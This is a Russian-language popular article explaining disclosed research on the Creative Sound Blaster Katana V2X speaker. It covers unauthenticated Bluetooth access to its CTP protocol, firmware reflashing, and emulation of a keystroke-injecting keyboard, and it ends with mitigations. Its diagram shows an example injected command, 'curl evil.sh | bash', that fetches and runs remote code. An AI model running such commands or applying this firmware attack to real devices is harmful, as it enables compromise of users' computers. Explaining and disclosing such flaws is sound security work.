Как колонка может взломать твой компьютер

Представь: на столе стоит обычная колонка, подключённая к ПК по USB. Она воспроизводит звук, светится и выглядит безобидно. А теперь представь, что это же устройство может удалённо напечатать команды в твоём терминале.

Протокол, который забыли закрыть

История началась с исследования Creative Sound Blaster Katana V2X. Автор статьи с сайта nns.ee изучал способ общения с колонкой и обнаружил фирменный протокол CTP, который используется для настройки устройства.

По USB доступ к CTP защищён challenge-response аутентификацией. Но по Bluetooth всё оказалось куда проще: достаточно подключиться к устройству, и можно отправлять команды напрямую.

USB vs BLUETOOTH
────────────────
USB:   [ПК] ──▶ [CTP] ──▶ [AUTH] ──▶ [Команда] ✅
       │        │         требуется
       │        ▼
       └── (требует подключения)

Bluetooth: [Атакующий] ──▶ [CTP] ──▶ [Команда] ✅
           15 метров       напрямую, без пароля

Прошивка как оружие

После получения доступа к командам следующим шагом стала прошивка. Через CTP можно обновлять firmware, и автор смог извлечь оригинальный образ, изменить его и загрузить обратно по Bluetooth.

В примере он заменил строку WELCOME на PATCHED. Колонка приняла изменённую прошивку, а защита сводилась к обычному хешу SHA-256, который можно пересчитать после изменений.

Rubber ducky, только по воздуху

Самая опасная часть идеи в том, что колонка продолжает работать как привычное аудиоустройство, но при этом может быть перепрошита так, чтобы эмулировать клавиатуру. По USB она уже доверена системе, а значит может отправлять нажатия клавиш как HID-устройство.

В прошивке уже есть поддержка HID-функций для управления громкостью и воспроизведением. Автор показал, что в описании устройства можно добавить и клавиатуру, после чего колонка становится способом инъекции команд в компьютер.

ЭТАПЫ ПРЕВРАЩЕНИЯ КОЛОНКИ В КЛАВИАТУРУ
───────────────────────────────────────
1. [Атакующий]        Загрузка модифицированной прошивки
     │                      через Bluetooth (~15м)
     ▼                      на колонку
2. [PATCHED Firmware] Запуск с поддержкой Keyboard HID
     │                      в дополнение к Audio
     ▼
3. [Katana V2X]       Заставляет ПК видеть клавиатуру
     │                      через USB-подключение
     ▼
4. [ПК]               Автоматическое распознавание
     │                      как HID-устройства
     ▼
5. [Keystroke Injection] Отправка команд:
     │   gnome-calculator &     │
     │   curl evil.sh | bash    │
     ▼                         ▼
  Открывает калькулятор     Выполняет произвольный код

Где границы

Атака не выглядит массовой и универсальной. Радиус Bluetooth ограничен, стены сокращают дальность, а модификация прошивки требует серьёзной подготовки и навыков реверс-инжиниринга.

Но сам принцип тревожный: периферийное устройство, которому доверяет компьютер, может стать точкой входа для атаки снаружи.

Что с этим делать

Если у тебя есть такая колонка, разумно отключить Bluetooth, если он не нужен, и не держать устройство постоянно подключённым к ПК по USB. В корпоративной среде полезно ограничивать новые HID-устройства и контролировать автозапуск периферии.

Эта история напоминает, что любое удобство в железе стоит проверять на безопасность. Устройство, созданное для звука, может неожиданно стать каналом для выполнения команд на компьютере.

Выводы

• Bluetooth-доступ без аутентификации превращает колонку в удалённую точку управления.
• Модифицируемая прошивка позволяет расширить возможности устройства до HID-атаки.
• Даже обычная периферия может стать инструментом компрометации доверенного ПК.

Ссылки

• Оригинальная статья на nns.ee — разбор уязвимости Creative Sound Blaster Katana V2X
• v2x-ctl — утилита автора для работы с Katana V2X